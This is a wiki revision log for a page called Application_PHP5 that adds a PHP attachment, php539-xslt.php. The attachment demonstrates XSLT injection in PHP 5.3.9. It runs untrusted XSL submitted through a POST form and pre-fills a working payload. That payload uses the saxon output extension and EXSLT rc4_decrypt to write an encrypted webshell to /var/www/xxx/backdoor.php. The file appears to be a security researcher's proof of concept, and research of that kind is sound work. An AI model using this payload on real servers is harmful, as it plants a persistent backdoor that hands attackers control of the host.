Changes for page Application_PHP5

Last modified by Nicolas Gregoire on 2012/02/02 17:29
From version Icon 15.1 Icon
edited by Nicolas Gregoire
on 2012/01/16 11:37
Change comment: There is no comment for this version
To version Icon 16.1 Icon
edited by Nicolas Gregoire
on 2012/01/16 11:38
Change comment: Upload new attachment php539-xslt.php

Summary

Details

Icon php539-xslt.php
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +2.0 KB
Content
... ... @@ -1,0 +1,68 @@
1 +
2 +<?php
3 +
4 +// Get parameters
5 +$action = $_POST['action'];
6 +$xml = $_POST['xml'];
7 +$xsl = $_POST['xsl'];
8 +
9 +print "<html><body>";
10 +if ($action == "transform") {
11 +
12 + print "<h2>Ready to transform ...</h2><br/>";
13 +
14 + # LOAD XML FILE
15 + $xmldom = new DOMDocument();
16 + print "XML: <pre>".htmlentities($xml)."</pre><br/>";
17 + $xmldom->loadXML($xml);
18 +
19 + # LOAD XSLT FILE
20 + $xsldom = new DOMDocument();
21 + print "XSL: <pre>".htmlentities($xsl)."</pre><br/>";
22 + $xsldom->loadXML($xsl); // Content of $xXsl may be untrusted !
23 +
24 + # START XSLT
25 + $xslproc = new XSLTProcessor();
26 + $xslproc->importStylesheet($xsldom);
27 +
28 + # TRANSFORM & PRINT
29 + $output = $xslproc->transformToXML($xmldom); // File creation !
30 + print "Output: <pre>".htmlentities($output)."</pre><br/>";
31 +
32 +} else {
33 +
34 + # DISPLAY A PRE-FILLED FORM
35 + print "<h1>Hello!</h1><h2>You just have to click on submit() ...</h2>";
36 + print "Consider modifying the output path (<i>/var/www/xxx/backdoor.php</i>) in the XSL<br/><br/>";
37 + print "<form method='post'>";
38 + print "XML document:<br/>";
39 + print "<textarea name='xml' rows='3' cols='130'><foobar/></textarea><br/><br/>";
40 + print "XSLT code:<br/>";
41 + print "<textarea name='xsl' rows='20' cols='130'>";
42 +print <<<XSLT
43 +<xsl:stylesheet
44 + version="1.0"
45 + xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
46 + xmlns:cry="http://exslt.org/crypto"
47 + xmlns:sax="http://icl.com/saxon"
48 + extension-element-prefixes="cry sax">
49 +
50 + <xsl:template match="/">
51 + <sax:output href="/var/www/xxx/backdoor.php" method="text">
52 + <xsl:value-of select="cry:rc4_decrypt('simple_demo', '0262ee34196ae2df1ab850c1705ee0c38dc6ae42bbeecf140dea99675fb35539a4dcbeaf5c2e6a6cae679843dbf3650275a6be07464047dc17eff2661b8f065f0ae3abcd3b33e9fd3c48a36f2201ae65e093fa45b0a1b55cd408ec815a8dada050b8881b99e957704dc5f17208d105966680a26f')"/>
53 + </sax:output>
54 + <xsl:text>A webshell have been dropped</xsl:text>
55 + </xsl:template>
56 +
57 +</xsl:stylesheet>
58 +XSLT;
59 + print "</textarea><br/><br/>";
60 + print "<input type='hidden' name='action' value='transform'/>";
61 + print "<input type='submit'/></form>";
62 +
63 +}
64 +print "</body></html>";
65 +
66 +?>
67 +
68 +